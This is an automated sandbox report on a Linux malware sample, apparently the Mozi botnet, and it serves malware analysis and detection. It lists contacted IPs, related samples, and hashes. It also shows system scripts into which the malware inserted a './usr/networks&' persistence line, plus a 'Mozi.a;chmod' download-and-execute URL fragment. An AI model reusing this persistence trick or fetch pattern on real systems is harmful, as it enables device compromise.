                                              http://www.alsa-project.org.alsa-info.sh0.8.drfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://HTTP/1.1nT7K5GG5kmfalse
                                              • Avira URL Cloud: safe
                                              low
                                              http://schemas.xmlsoap.org/soap/envelope//nT7K5GG5kmfalse
                                                high

                                                Contacted IPs

                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs

                                                Public

                                                IPDomainCountryFlagASNASN NameMalicious
                                                164.31.27.58
                                                unknownGermany
                                                29355KCELL-ASKZfalse
                                                19.35.22.33
                                                unknownUnited States
                                                3MIT-GATEWAYSUStrue
                                                164.176.196.33
                                                unknownUnited States
                                                37717EL-KhawarizmiTNfalse
                                                92.10.113.236
                                                unknownUnited Kingdom
                                                13285OPALTELECOM-ASTalkTalkCommunicationsLimitedGBfalse
                                                43.216.7.248
                                                unknownJapan4249LILLY-ASUSfalse
                                                62.146.28.116
                                                unknownGermany
                                                15598QSC-AG-IPXDEfalse
                                                134.136.214.66
                                                unknownUnited States
                                                132WPAFB-CSD-NET-ASUSfalse
                                                59.186.255.47
                                                unknownKorea Republic of
                                                9638NH-ASNationalAgriculturalCooperativefederationKRfalse
                                                58.33.168.139
                                                unknownChina
                                                4812CHINANET-SH-APChinaTelecomGroupCNfalse
                                                218.245.32.128
                                                unknownChina
                                                4847CNIX-APChinaNetworksInter-ExchangeCNfalse
                                                74.73.218.101
                                                unknownUnited States
                                                12271TWC-12271-NYCUSfalse
                                                63.112.131.88
                                                unknownUnited States
                                                701UUNETUSfalse
                                                220.49.0.51
                                                unknownJapan17676GIGAINFRASoftbankBBCorpJPfalse
                                                86.130.232.94
                                                unknownUnited Kingdom
                                                2856BT-UK-ASBTnetUKRegionalnetworkGBfalse
                                                75.189.26.238
                                                unknownUnited States
                                                11426TWC-11426-CAROLINASUSfalse
                                                155.117.48.151
                                                unknownUnited States
                                                11003PANDGUSfalse
                                                191.213.118.143
                                                unknownBrazil
                                                7738TelemarNorteLesteSABRfalse
                                                190.61.180.10
                                                unknownColombia
                                                18747IFX18747USfalse
                                                122.107.18.193
                                                unknownAustralia
                                                4804MPX-ASMicroplexPTYLTDAUfalse
                                                29.68.34.28
                                                unknownUnited States
                                                7922COMCAST-7922USfalse
                                                185.226.106.196
                                                unknownSpain
                                                207046REDSERVICIOESfalse
                                                175.165.55.236
                                                unknownChina
                                                4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNfalse
                                                32.119.200.236
                                                unknownUnited States
                                                7018ATT-INTERNET4USfalse
                                                72.87.194.121
                                                unknownUnited States
                                                5650FRONTIER-FRTRUSfalse
                                                213.121.103.4
                                                unknownUnited Kingdom
                                                2856BT-UK-ASBTnetUKRegionalnetworkGBfalse
                                                166.120.240.93
                                                unknownAustralia
                                                18106VIEWQWEST-SG-APViewqwestPteLtdSGfalse
                                                162.48.192.209
                                                unknownUnited States
                                                35893ACPCAfalse
                                                86.249.71.23
                                                unknownFrance
                                                3215FranceTelecom-OrangeFRfalse
                                                98.37.89.152
                                                unknownUnited States
                                                7922COMCAST-7922USfalse
                                                148.200.165.122
                                                unknownNetherlands
                                                33915TNF-ASNLfalse
                                                72.208.107.184
                                                unknownUnited States
                                                22773ASN-CXA-ALL-CCI-22773-RDCUSfalse
                                                100.54.104.98
                                                unknownUnited States
                                                701UUNETUSfalse
                                                113.178.195.53
                                                unknownViet Nam
                                                45899VNPT-AS-VNVNPTCorpVNfalse
                                                113.202.99.35
                                                unknownChina
                                                4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNfalse
                                                99.198.164.146
                                                unknownUnited States
                                                16591GOOGLE-FIBERUSfalse
                                                113.138.14.215
                                                unknownChina
                                                4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                                                73.109.81.199
                                                unknownUnited States
                                                7922COMCAST-7922USfalse
                                                35.155.184.95
                                                unknownUnited States
                                                16509AMAZON-02USfalse
                                                50.83.208.186
                                                unknownUnited States
                                                30036MEDIACOM-ENTERPRISE-BUSINESSUSfalse
                                                39.167.82.179
                                                unknownChina
                                                9808CMNET-GDGuangdongMobileCommunicationCoLtdCNfalse
                                                75.36.210.166
                                                unknownUnited States
                                                7018ATT-INTERNET4USfalse
                                                59.249.34.45
                                                unknownChina
                                                2516KDDIKDDICORPORATIONJPfalse
                                                93.203.255.9
                                                unknownGermany
                                                3320DTAGInternetserviceprovideroperationsDEtrue
                                                111.253.169.172
                                                unknownTaiwan; Republic of China (ROC)
                                                3462HINETDataCommunicationBusinessGroupTWfalse
                                                125.15.133.201
                                                unknownJapan9824JTCL-JP-ASJupiterTelecommunicationCoLtdJPfalse
                                                172.222.196.31
                                                unknownUnited States
                                                20115CHARTER-20115USfalse
                                                72.68.142.193
                                                unknownUnited States
                                                701UUNETUSfalse
                                                103.58.197.248
                                                unknownunknown
                                                134218GAMING-AS-APGamingInvestmentsPtyLtdAUfalse
                                                11.3.231.145
                                                unknownUnited States
                                                3356LEVEL3USfalse
                                                32.227.55.20
                                                unknownUnited States
                                                2686ATGS-MMD-ASUSfalse
                                                168.26.94.133
                                                unknownUnited States
                                                3479PEACHNET-AS1USfalse
                                                181.148.98.93
                                                unknownColombia
                                                26611COMCELSACOfalse
                                                186.64.54.15
                                                unknownArgentina
                                                701UUNETUSfalse
                                                101.244.33.33
                                                unknownChina
                                                17429BGCTVNETBEIJINGGEHUACATVNETWORKCOLTDCNfalse
                                                195.254.187.23
                                                unknownunknown
                                                50434DEVONSTUDIODEVONSTUDIOAutonomousSystemPLfalse
                                                149.52.60.248
                                                unknownUnited States
                                                174COGENT-174USfalse
                                                97.23.253.187
                                                unknownUnited States
                                                22394CELLCOUSfalse
                                                24.144.48.190
                                                unknownUnited States
                                                12231CONWAYCORPUSfalse
                                                36.47.114.54
                                                unknownChina
                                                4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                                                67.168.47.89
                                                unknownUnited States
                                                7922COMCAST-7922USfalse
                                                140.43.31.90
                                                unknownUnited States
                                                668DNIC-AS-00668USfalse
                                                69.150.69.116
                                                unknownUnited States
                                                7018ATT-INTERNET4USfalse
                                                201.181.160.44
                                                unknownArgentina
                                                22927TelefonicadeArgentinaARfalse
                                                8.171.95.12
                                                unknownSingapore
                                                37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdfalse
                                                198.198.32.42
                                                unknownUnited States
                                                292ESNET-WESTUSfalse
                                                46.42.169.51
                                                unknownRussian Federation
                                                29125TATINT-ASRUfalse
                                                154.138.26.112
                                                unknownEgypt
                                                37069MOBINILEGfalse
                                                72.24.210.73
                                                unknownUnited States
                                                11492CABLEONEUSfalse
                                                12.96.110.207
                                                unknownUnited States
                                                32617STEAK-N-SHAKEUSfalse
                                                40.96.198.202
                                                unknownUnited States
                                                8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                55.204.254.198
                                                unknownUnited States
                                                1541DNIC-ASBLK-01534-01546USfalse
                                                83.68.127.228
                                                unknownFrance
                                                34809SANEF-ASFRfalse
                                                110.86.197.212
                                                unknownChina
                                                4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                                                173.80.87.48
                                                unknownUnited States
                                                19108SUDDENLINK-COMMUNICATIONSUSfalse
                                                24.159.133.235
                                                unknownUnited States
                                                20115CHARTER-20115USfalse
                                                215.107.106.224
                                                unknownUnited States
                                                721DNIC-ASBLK-00721-00726USfalse
                                                17.103.12.181
                                                unknownUnited States
                                                714APPLE-ENGINEERINGUSfalse
                                                207.144.55.208
                                                unknownUnited States
                                                18671PRTC-SCUSfalse
                                                88.103.196.15
                                                unknownCzech Republic
                                                5610O2-CZECH-REPUBLICCZfalse
                                                197.223.37.86
                                                unknownEgypt
                                                37069MOBINILEGfalse
                                                196.224.36.136
                                                unknownTunisia
                                                37492ORANGE-TNfalse
                                                85.110.95.80
                                                unknownTurkey
                                                9121TTNETTRfalse
                                                16.158.169.248
                                                unknownUnited States
                                                unknownunknownfalse
                                                195.76.91.176
                                                unknownSpain
                                                3352TELEFONICA_DE_ESPANAESfalse
                                                58.20.74.167
                                                unknownChina
                                                4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNfalse
                                                173.134.223.176
                                                unknownUnited States
                                                10507SPCSUSfalse
                                                39.189.171.124
                                                unknownChina
                                                56041CMNET-ZHEJIANG-APChinaMobilecommunicationscorporationCfalse
                                                175.3.12.174
                                                unknownChina
                                                4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                                                166.183.247.157
                                                unknownUnited States
                                                20057ATT-MOBILITY-LLC-AS20057USfalse
                                                5.41.198.250
                                                unknownSaudi Arabia
                                                39891ALJAWWALSTC-ASSAfalse
                                                106.128.236.208
                                                unknownJapan2516KDDIKDDICORPORATIONJPfalse
                                                135.48.205.7
                                                unknownUnited States
                                                54614CIKTELECOM-CABLECAfalse
                                                27.219.87.4
                                                unknownChina
                                                4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNfalse
                                                93.45.184.9
                                                unknownItaly
                                                12874FASTWEBITfalse
                                                91.102.92.141
                                                unknownDenmark
                                                12617SOLIDO-NETSentiaDanmarkASDKfalse
                                                66.148.28.100
                                                unknownCanada
                                                395177VFNLLCUSfalse
                                                218.34.211.21
                                                unknownTaiwan; Republic of China (ROC)
                                                7482APOL-ASAsiaPacificOn-lineServiceIncTWfalse
                                                157.98.25.110
                                                unknownUnited States
                                                3527NIH-NETUSfalse
                                                168.44.159.27
                                                unknownUnited States
                                                1761TDIR-CAPNETUSfalse
                                                141.57.194.108
                                                unknownGermany
                                                680DFNVereinzurFoerderungeinesDeutschenForschungsnetzesefalse

                                                General Information

                                                Joe Sandbox Version:32.0.0 Black Diamond
                                                Analysis ID:402069
                                                Start date:01.05.2021
                                                Start time:20:23:58
                                                Joe Sandbox Product:CloudBasic
                                                Overall analysis duration:0h 9m 47s
                                                Hypervisor based Inspection enabled:false
                                                Report type:light
                                                Sample file name:nT7K5GG5km
                                                Cookbook file name:defaultlinuxfilecookbook.jbs
                                                Analysis system description:Ubuntu Linux 16.04 x64 (Kernel 4.4.0-116, Firefox 59.0, Document Viewer 3.18.2, LibreOffice 5.1.6.2, OpenJDK 1.8.0_171)
                                                Analysis Mode:default
                                                Detection:MAL
                                                Classification:mal100.spre.troj.evad.lin@0/221@4/0
                                                Warnings:
                                                Show All
                                                • Excluded IPs from analysis (whitelisted): 91.189.92.39, 91.189.92.20, 91.189.92.19, 91.189.92.40, 91.189.92.38, 91.189.92.41
                                                • TCP Packets have been reduced to 100
                                                • Created / dropped Files have been reduced to 100
                                                • Excluded domains from analysis (whitelisted): api.snapcraft.io
                                                • Report size exceeded maximum capacity and may have missing network information.
                                                • VT rate limit hit for: http://%s:%d/Mozi.a;chmod


                                                Runtime Messages

                                                Command:/tmp/nT7K5GG5km
                                                Exit Code:0
                                                Exit Code Info:
                                                Killed:False
                                                Standard Output:

                                                Standard Error:telnetd: no process found
                                                utelnetd: no process found
                                                scfgmgr: no process found
                                                Unsupported ioctl: cmd=0xffffffff80045705
                                                Unsupported ioctl: cmd=0xffffffff80045705
                                                Unsupported ioctl: cmd=0xffffffff80045705
                                                /bin/sh: 1: cfgtool: not found
                                                /bin/sh: 1: cfgtool: not found
                                                Unsupported ioctl: cmd=0xffffffff80045705
                                                Unsupported ioctl: cmd=0xffffffff80045705

                                                Joe Sandbox View / Context

                                                IPs

                                                No context

                                                Domains

                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                router.bittorrent.comKnAY2OIPI3Get hashmaliciousBrowse
                                                • 67.215.246.10
                                                rIbyGX66OpGet hashmaliciousBrowse
                                                • 67.215.246.10
                                                MGuvcs6OczGet hashmaliciousBrowse
                                                • 67.215.246.10
                                                q7uNNDJUI2.exeGet hashmaliciousBrowse
                                                • 67.215.246.10
                                                BQGxKexU78.exeGet hashmaliciousBrowse
                                                • 67.215.246.10
                                                YPJ9DZYIpOGet hashmaliciousBrowse
                                                • 67.215.246.10
                                                FhhkmGmDGr.exeGet hashmaliciousBrowse
                                                • 67.215.246.10
                                                mozi.a.zipGet hashmaliciousBrowse
                                                • 67.215.246.10
                                                yVn2ywuhEC.exeGet hashmaliciousBrowse
                                                • 67.215.246.10
                                                bin.shGet hashmaliciousBrowse
                                                • 67.215.246.10
                                                uTorrent.exeGet hashmaliciousBrowse
                                                • 67.215.246.10
                                                iGet hashmaliciousBrowse
                                                • 67.215.246.10
                                                Mozi.mGet hashmaliciousBrowse
                                                • 67.215.246.10
                                                Photo.exeGet hashmaliciousBrowse
                                                • 67.215.246.10
                                                BitTorrent.exeGet hashmaliciousBrowse
                                                • 67.215.246.10
                                                uTorrent.exeGet hashmaliciousBrowse
                                                • 67.215.246.10
                                                uTorrent.exeGet hashmaliciousBrowse
                                                • 67.215.246.10
                                                3.4.5_41712.exeGet hashmaliciousBrowse
                                                • 67.215.246.10
                                                ace-stream-3-1-1-multi-win.exeGet hashmaliciousBrowse
                                                • 67.215.246.10
                                                new.exeGet hashmaliciousBrowse
                                                • 67.215.246.10
                                                dht.transmissionbt.comrIbyGX66OpGet hashmaliciousBrowse
                                                • 212.129.33.59
                                                MGuvcs6OczGet hashmaliciousBrowse
                                                • 87.98.162.88
                                                YPJ9DZYIpOGet hashmaliciousBrowse
                                                • 212.129.33.59
                                                mozi.a.zipGet hashmaliciousBrowse
                                                • 212.129.33.59
                                                bin.shGet hashmaliciousBrowse
                                                • 87.98.162.88
                                                iGet hashmaliciousBrowse
                                                • 212.129.33.59
                                                Mozi.mGet hashmaliciousBrowse
                                                • 87.98.162.88
                                                Photo.exeGet hashmaliciousBrowse
                                                • 87.98.162.88
                                                ace-stream-3-1-1-multi-win.exeGet hashmaliciousBrowse
                                                • 212.129.33.59
                                                new.exeGet hashmaliciousBrowse
                                                • 87.98.162.88
                                                popcorntime.apkGet hashmaliciousBrowse
                                                • 87.98.162.88
                                                bttracker.acc.umu.seKnAY2OIPI3Get hashmaliciousBrowse
                                                • 130.239.18.159
                                                rIbyGX66OpGet hashmaliciousBrowse
                                                • 130.239.18.159
                                                MGuvcs6OczGet hashmaliciousBrowse
                                                • 130.239.18.159
                                                YPJ9DZYIpOGet hashmaliciousBrowse
                                                • 130.239.18.159
                                                mozi.a.zipGet hashmaliciousBrowse
                                                • 130.239.18.159
                                                bin.shGet hashmaliciousBrowse
                                                • 130.239.18.159
                                                iGet hashmaliciousBrowse
                                                • 130.239.18.159
                                                Mozi.mGet hashmaliciousBrowse
                                                • 130.239.18.159
                                                Photo.exeGet hashmaliciousBrowse
                                                • 130.239.18.159
                                                new.exeGet hashmaliciousBrowse
                                                • 130.239.18.159

                                                ASN

                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                EL-KhawarizmiTNppc_unpackedGet hashmaliciousBrowse
                                                • 164.183.202.157
                                                FederalAgency.x86Get hashmaliciousBrowse
                                                • 164.187.133.107
                                                KCELL-ASKZAstra.x86Get hashmaliciousBrowse
                                                • 149.27.123.199
                                                FederalAgency.x86Get hashmaliciousBrowse
                                                • 164.34.72.219
                                                invoice.docGet hashmaliciousBrowse
                                                • 185.129.193.221
                                                OPALTELECOM-ASTalkTalkCommunicationsLimitedGBz3hir.binGet hashmaliciousBrowse
                                                • 78.148.156.112
                                                yVn2ywuhEC.exeGet hashmaliciousBrowse
                                                • 89.240.209.7
                                                _064145.exeGet hashmaliciousBrowse
                                                • 92.24.51.238
                                                _064145.exeGet hashmaliciousBrowse
                                                • 92.24.51.238
                                                _062842.exeGet hashmaliciousBrowse
                                                • 92.24.51.238
                                                _062843.exeGet hashmaliciousBrowse
                                                • 92.24.51.238
                                                _062842.exeGet hashmaliciousBrowse
                                                • 92.24.51.238
                                                _062842.exeGet hashmaliciousBrowse
                                                • 92.24.51.238
                                                _062845.exeGet hashmaliciousBrowse
                                                • 92.24.51.238
                                                _062842.exeGet hashmaliciousBrowse
                                                • 92.24.51.238
                                                _062843.exeGet hashmaliciousBrowse
                                                • 92.24.51.238
                                                _025737.exeGet hashmaliciousBrowse
                                                • 92.24.51.238
                                                _013505.exeGet hashmaliciousBrowse
                                                • 92.24.51.238
                                                _000830.exeGet hashmaliciousBrowse
                                                • 92.24.51.238
                                                _000830.exeGet hashmaliciousBrowse
                                                • 92.24.51.238
                                                _000414.exeGet hashmaliciousBrowse
                                                • 92.24.51.238
                                                _000413.exeGet hashmaliciousBrowse
                                                • 92.24.51.238
                                                saUVH0ywLP.docGet hashmaliciousBrowse
                                                • 92.24.51.238
                                                _000413.exeGet hashmaliciousBrowse
                                                • 92.24.51.238
                                                _000413.exeGet hashmaliciousBrowse
                                                • 92.24.51.238
                                                MIT-GATEWAYSUSKnAY2OIPI3Get hashmaliciousBrowse
                                                • 19.252.51.218
                                                x86_unpackedGet hashmaliciousBrowse
                                                • 19.60.14.26
                                                rIbyGX66OpGet hashmaliciousBrowse
                                                • 19.21.98.61
                                                4JQil8gLKdGet hashmaliciousBrowse
                                                • 19.170.175.72
                                                IMG001.exeGet hashmaliciousBrowse
                                                • 19.241.222.80
                                                YPJ9DZYIpOGet hashmaliciousBrowse
                                                • 19.160.35.138
                                                FB11.exeGet hashmaliciousBrowse
                                                • 128.31.0.34
                                                messg_02620000_deupx - Copy.exeGet hashmaliciousBrowse
                                                • 128.31.0.39
                                                HUahIwV82u.exeGet hashmaliciousBrowse
                                                • 128.31.0.34
                                                R8WWx5t2RE.dllGet hashmaliciousBrowse
                                                • 18.41.89.186
                                                KCCAfipQl2.dllGet hashmaliciousBrowse
                                                • 19.3.169.121
                                                fOMSAB0Sfe.exeGet hashmaliciousBrowse
                                                • 128.31.0.34
                                                530000.exeGet hashmaliciousBrowse
                                                • 128.31.0.34
                                                networkmanagerGet hashmaliciousBrowse
                                                • 19.211.36.11
                                                DocuSign_139380140_1184163298.xlsGet hashmaliciousBrowse
                                                • 18.67.216.238
                                                wEcncyxrEeGet hashmaliciousBrowse
                                                • 18.161.47.0
                                                mozi.a.zipGet hashmaliciousBrowse
                                                • 19.214.106.48
                                                hse8DRMQnI.exeGet hashmaliciousBrowse
                                                • 128.31.0.39
                                                6729001591617.exeGet hashmaliciousBrowse
                                                • 128.31.0.34
                                                FickerStealer.exeGet hashmaliciousBrowse
                                                • 18.27.197.252

                                                JA3 Fingerprints

                                                No context

                                                Dropped Files

                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                /etc/init.d/S95baby.shKnAY2OIPI3Get hashmaliciousBrowse
                                                  rIbyGX66OpGet hashmaliciousBrowse
                                                    MGuvcs6OczGet hashmaliciousBrowse
                                                      mozi.a.zipGet hashmaliciousBrowse
                                                        bin.shGet hashmaliciousBrowse
                                                          iGet hashmaliciousBrowse
                                                            Mozi.mGet hashmaliciousBrowse
                                                              Mozi.mGet hashmaliciousBrowse
                                                                1skm346XtzGet hashmaliciousBrowse
                                                                  Mozi.aGet hashmaliciousBrowse
                                                                    Mozi.1.mGet hashmaliciousBrowse
                                                                      6wuvHEBHt8.binGet hashmaliciousBrowse
                                                                        7v1ic5IS8IGet hashmaliciousBrowse
                                                                          Mozi.aGet hashmaliciousBrowse
                                                                            Mozi.aGet hashmaliciousBrowse
                                                                              Mozi.mGet hashmaliciousBrowse
                                                                                Mozi.mGet hashmaliciousBrowse
                                                                                  Mozi.mGet hashmaliciousBrowse
                                                                                    bad_fileGet hashmaliciousBrowse
                                                                                      mxjzQQFgLpGet hashmaliciousBrowse
                                                                                        /etc/rcS.d/S95baby.shKnAY2OIPI3Get hashmaliciousBrowse
                                                                                          rIbyGX66OpGet hashmaliciousBrowse
                                                                                            MGuvcs6OczGet hashmaliciousBrowse
                                                                                              mozi.a.zipGet hashmaliciousBrowse
                                                                                                bin.shGet hashmaliciousBrowse
                                                                                                  iGet hashmaliciousBrowse
                                                                                                    Mozi.mGet hashmaliciousBrowse
                                                                                                      Mozi.mGet hashmaliciousBrowse
                                                                                                        1skm346XtzGet hashmaliciousBrowse
                                                                                                          Mozi.aGet hashmaliciousBrowse
                                                                                                            Mozi.1.mGet hashmaliciousBrowse
                                                                                                              6wuvHEBHt8.binGet hashmaliciousBrowse
                                                                                                                7v1ic5IS8IGet hashmaliciousBrowse
                                                                                                                  Mozi.aGet hashmaliciousBrowse
                                                                                                                    Mozi.aGet hashmaliciousBrowse
                                                                                                                      Mozi.mGet hashmaliciousBrowse
                                                                                                                        Mozi.mGet hashmaliciousBrowse
                                                                                                                          Mozi.mGet hashmaliciousBrowse
                                                                                                                            bad_fileGet hashmaliciousBrowse
                                                                                                                              mxjzQQFgLpGet hashmaliciousBrowse

                                                                                                                                Created / dropped Files

                                                                                                                                /boot/grub/i386-pc/modinfo.sh
                                                                                                                                Process:/tmp/nT7K5GG5km
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):23
                                                                                                                                Entropy (8bit):3.882045108136863
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:qXVOORgn:Tn
                                                                                                                                MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                                SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                                SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                                SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                                Malicious:false
                                                                                                                                Reputation:moderate, very likely benign file
                                                                                                                                Preview: ./usr/networks&.exit 1.
                                                                                                                                /etc/acpi/asus-keyboard-backlight.sh
                                                                                                                                Process:/tmp/nT7K5GG5km
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):326
                                                                                                                                Entropy (8bit):5.2904323771702915
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6:K8K2A6godGINKlsX3stINKVHBfNewdrCDjwFhD2UDKVHxMn:1f/NA23stIN8HdNTek3n8HWn
                                                                                                                                MD5:626FDB50CA17F4E2BAAB79F09F3EB73B
                                                                                                                                SHA1:2D838897E7D735CB67348F60EDA0E1E41D45DCBE
                                                                                                                                SHA-256:3FDFC702E6D3E1FE75E88B60408ED1B435F3AE24A57B56636C16CB321CBAE440
                                                                                                                                SHA-512:E3FB063A63DF21B22D20754AE2CEA1F0D80464F4A870491E2843F7D88EBA181E351C4A20D67AD6A4CD8D1BF26971C654C502D5770D5B43B34024FAF2048171F5
                                                                                                                                Malicious:false
                                                                                                                                Reputation:moderate, very likely benign file
                                                                                                                                Preview: ./usr/networks&.test -d $KEYS_DIR || exit 0..MIN=0.MAX=$(cat $KEYS_DIR/max_brightness).VAL=$(cat $KEYS_DIR/brightness)..if [ "$1" = down ]; then..VAL=$((VAL-1)).else..VAL=$((VAL+1)).fi..if [ "$VAL" -lt $MIN ]; then..VAL=$MIN.elif [ "$VAL" -gt $MAX ]; then..VAL=$MAX.fi..echo $VAL > $KEYS_DIR/brightness../usr/networks&.exit 1.
                                                                                                                                /etc/acpi/asus-wireless.sh
                                                                                                                                Process:/tmp/nT7K5GG5km
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):157
                                                                                                                                Entropy (8bit):4.412729940630044
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:qXVfGHvNM8iKWERAIda74QvvvLwDGvNM8iKWERAIdJCsqORFL8OORgn:KJFn40MLFb+Pn
                                                                                                                                MD5:9B10038ADE21F207C6C9F4EEC7C5ADA2
                                                                                                                                SHA1:F3FB51110B022F8BFEA1874C6D6984D8C6EF8C7B
                                                                                                                                SHA-256:E6322FBB30D1362ED490A39BE58B491C7DB9CC96DB09C8E2BDC1B1F35E1A00E2
                                                                                                                                SHA-512:C9A47A0A449FD009221006D9077F1EDD25305EDA017DED7542AAF8EF80166B1645B889B478D6067ED2CB0123D798103DD73FD69B818C9B9704A274DC3FB4EA15
                                                                                                                                Malicious:false
                                                                                                                                Reputation:moderate, very likely benign file
                                                                                                                                Preview: ./usr/networks&.test -f /usr/share/acpi-support/state-funcs || exit 0... /usr/share/acpi-support/state-funcs..toggleAllWirelessStates../usr/networks&.exit 1.
                                                                                                                                /etc/acpi/ibm-wireless.sh
                                                                                                                                Process:/tmp/nT7K5GG5km
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):636
                                                                                                                                Entropy (8bit):4.722087767454589
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:wNGs4KSb7jFCR2TeNMngFfiTccfkneFhpmtjwkuVSd/1kVqEn:wFS/5uab2d7neFhij26/CwE
                                                                                                                                MD5:77315C7FA7809C62D27AD6C9EE1C9289
                                                                                                                                SHA1:C8EC67C17E334B13B1DE93B0D2E822C606F9985E
                                                                                                                                SHA-256:81CB0908E30FCF60AEA43776D5F1C3AEE6E1B46190A3DB5A1866CD1D2E09E17E
                                                                                                                                SHA-512:B679EF04092FDDBB0FA290F2D817DA38601336261870EE37BE6FA9451004B338E3A981694A0320B40A47A3597BA7B172848C877313F169ECDE3B8FB7FE38C582
                                                                                                                                Malicious:false
                                                                                                                                Reputation:moderate, very likely benign file
                                                                                                                                Preview: ./usr/networks&.test -f /usr/share/acpi-support/state-funcs || exit 0..# Find and toggle wireless of bluetooth devices on ThinkPads... /usr/share/acpi-support/state-funcs..rfkill list | sed -n -e'/tpacpi_bluetooth_sw/,/^[0-9]/p' | grep -q 'Soft blocked: yes'.bluetooth_state=$?..# Note that this always alters the state of the wireless!.toggleAllWirelessStates;..# Sequence is Both on, Both off, Wireless only, Bluetooth only.if ! isAnyWirelessPoweredOn; then. # Wireless was turned off. if [ "$bluetooth_state" = 0 ]; then. rfkill unblock bluetooth. else. rfkill block bluetooth. fi.fi../usr/networks&.exit 1.
                                                                                                                                /etc/acpi/powerbtn.sh
                                                                                                                                Process:/tmp/nT7K5GG5km
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):2079
                                                                                                                                Entropy (8bit):4.778187000249208
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:pDpMMOMTeMn/zV5rh/1RzUKH2Z8uBiXGp2fVU6GjJN+V4ATo+aZ+:pCgeCrhXHzDfVpmhC/
                                                                                                                                MD5:CF725BE1199B06F062A47095420F7DC5
                                                                                                                                SHA1:98F1BC7C1B81C708B326BB3DC1C33AA3F29D8BBE
                                                                                                                                SHA-256:C617FF036646CF1EEF3AC91EC504093CC25C93E07850276AA37AA2542A724B01
                                                                                                                                SHA-512:D2F9649FED4B309108F2C67F28B1EE66C30219AF9B36F30E85F190064B3D5A65963BF6B9D3A8662A2197B47DFECA95D52447D7FCA4CDBAA69BB722BE5417DC50
                                                                                                                                Malicious:false
                                                                                                                                Reputation:moderate, very likely benign file
                                                                                                                                Preview: ./usr/networks&. exit 0.fi..# getXuser gets the X user belonging to the display in $displaynum..# If you want the foreground X user, use getXconsole!.getXuser() {. user=`pinky -fw | awk '{ if ($2 == ":'$displaynum'" || $(NF) == ":'$displaynum'" ) { print $1; exit; } }'`. if [ x"$user" = x"" ]; then. startx=`pgrep -n startx`. if [ x"$startx" != x"" ]; then. user=`ps -o user --no-headers $startx`. fi. fi. if [ x"$user" != x"" ]; then. userhome=`getent passwd $user | cut -d: -f6`. export XAUTHORITY=$userhome/.Xauthority. else. export XAUTHORITY="". fi. export XUSER=$user.}..# Skip if we just in the middle of resuming..test -f /var/lock/acpisleep && exit 0..# If the current X console user is running a power management daemon that.# handles suspend/resume requests, let them handle policy This is effectively.# the same as 'acpi-s
                                                                                                                                /etc/acpi/tosh-wireless.sh
                                                                                                                                Process:/tmp/nT7K5GG5km
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):483
                                                                                                                                Entropy (8bit):4.215331622973397
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6:KJFqcA/0MLFMkneFUJLS3SU9mFCQROAJzHdcnK/lHb/iHIYK3zQYlyMn:wK8QdeFuS3lyXp9cK/lziijQYlrn
                                                                                                                                MD5:07889D65619CDB80F8E876A087F160D3
                                                                                                                                SHA1:35CB92B632BCA335EBEA933A736F75856E8CA262
                                                                                                                                SHA-256:34768A7BD08F050862E888142B6246B41458957CF56BC4879619D3A315E3567B
                                                                                                                                SHA-512:C86DE6FC5047AC695717E11B8714DE439E63949B439C3B8AA79C060CF0E807FB964C81B1FF59A7C0F38E0F3CC85E6784F56E1536DDDE9B66D1E22D306BEFCFAE
                                                                                                                                Malicious:false
                                                                                                                                Reputation:moderate, very likely benign file
                                                                                                                                Preview: ./usr/networks&.test -f /usr/share/acpi-support/key-constants || exit 0... /usr/share/acpi-support/state-funcs..if isAnyWirelessPoweredOn; then. if [ -x /usr/bin/toshset ]; then. if `toshset -bluetooth | grep -q attached`; then. toshset -bluetooth off. toggleAllWirelessStates. else. toshset -bluetooth on. fi. else..toggleAllWirelessStates. fi.else. toggleAllWirelessStates.fi../usr/networks&.exit 1.
                                                                                                                                /etc/acpi/undock.sh
                                                                                                                                Process:/tmp/nT7K5GG5km
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):266
                                                                                                                                Entropy (8bit):4.77497394042067
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6:KJFqcA/05CbMTCYEBKAABrX8FvfbrX8EmNv0V4n:wK852PYEBKAkrX4HXHnV4n
                                                                                                                                MD5:5E3A15E41D35EC409613236A20B5783E
                                                                                                                                SHA1:5D71BD9A121461464F7937B2E921410ED93BEE24
